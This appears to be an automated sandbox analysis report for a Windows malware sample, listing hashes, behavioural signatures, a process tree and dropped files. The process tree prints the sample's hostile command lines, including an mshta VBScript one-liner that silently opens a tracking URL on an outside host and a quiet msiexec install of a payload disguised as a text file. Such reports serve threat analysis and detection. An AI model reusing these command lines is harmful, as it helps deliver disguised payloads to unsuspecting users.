Analysis

  • max time kernel
    229s
  • max time network
    309s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    03/12/2022, 08:04

General

  • Target

    61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe

  • Size

    1.1MB

  • MD5

    9e6fc523b4b7af53bb7bbb8e39441070

  • SHA1

    3f461debf3faade8bcf6f9e728f45d0a30efa6a0

  • SHA256

    61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024

  • SHA512

    64f0f79762d5b88683d9ba9ed64c9ed0fb03b2ed9483ae6b6531dc87a6ba3688bd5c40256fecef3a8f6c6b4347c37b4f45f2821af24d9b2377f6a6445ba62cba

  • SSDEEP

    24576:mVgdHVN5qTBqr4ETRudnITVllNv0cXruPS:mVSVNmBqrVTRuZWl1bwS

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 2 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 40 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe
    "C:\Users\Admin\AppData\Local\Temp\61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:596
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~8769.bat "C:\Users\Admin\AppData\Local\Temp\61a02c847c7bfe7f53eb024940ac75e683fd1c5a4d236109df2b9435761f1024.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1496
      • C:\Windows\SysWOW64\mshta.exe
        mshta vbscript:createobject("wscript.shell").run("""iexplore""http://cnzz.sjt8.com/info.access/?stat_it",0)(window.close)
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1264
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://cnzz.sjt8.com/info.access/?stat_it
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1280
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1280 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1908
      • C:\Windows\SysWOW64\msiexec.exe
        msiexec.exe /i "C:\Users\Admin\AppData\Local\hta.txt" /quiet
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1804
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:904
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 327DB6C15EB74EA8D976CEE92724FCDF
      2⤵
      • Loads dropped DLL
      PID:316

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\~8769.bat

    Filesize

    1KB

    MD5

    55e6b633560859a79fd6ab59c989aa4a

    SHA1

    b949ead8ee10d1ec202f0574a892d15f3a772ca9

    SHA256

    4da99471f0c9dd4779eeac2bb1dc232a036d9502226b091e1cc30816179d8f02

    SHA512

    a13fca308a9fc826f535783f35a3c5eaf6a14446a9ab5c650f1aaae6c63b1e8ad316640d933b563d06ee3810280b38e0de3eca46ae2be785710057cf1f7c1a8e

  • C:\Users\Admin\AppData\Local\hta.txt

    Filesize

    240KB

    MD5

    3fb2866481cf0d5bf34222343ef9834f

    SHA1

    3699c4d5821d347a82283b000c5e8e6cb5d23473

    SHA256

    f2dfda3c25046a5fa249df5efd5646ed01f4b4d3fbe7b4f939b158306d9956db

    SHA512

    71d4c040b8b9ed9a41aa11693fd1f1fa5cdef05bcb3f75c2a58d76816df1b0aef794019bc10ec107b4b6b260976ebda99357da3ebc441938d3c3a7a20ad1dc7c

  • C:\Windows\Installer\MSI10C.tmp

    Filesize

    48KB

    MD5

    9067aad412defc0d2888479609041392

    SHA1

    36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

    SHA256

    99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

    SHA512

    e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

  • C:\Windows\Installer\MSIFF18.tmp

    Filesize

    48KB

    MD5

    9067aad412defc0d2888479609041392

    SHA1

    36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

    SHA256

    99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

    SHA512

    e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

  • \Windows\Installer\MSI10C.tmp

    Filesize

    48KB

    MD5

    9067aad412defc0d2888479609041392

    SHA1

    36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

    SHA256

    99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

    SHA512

    e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

  • \Windows\Installer\MSIFF18.tmp

    Filesize

    48KB

    MD5

    9067aad412defc0d2888479609041392

    SHA1

    36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

    SHA256

    99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

    SHA512

    e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

  • memory/596-54-0x0000000076201000-0x0000000076203000-memory.dmp

    Filesize

    8KB

  • memory/904-61-0x000007FEFC311000-0x000007FEFC313000-memory.dmp

    Filesize

    8KB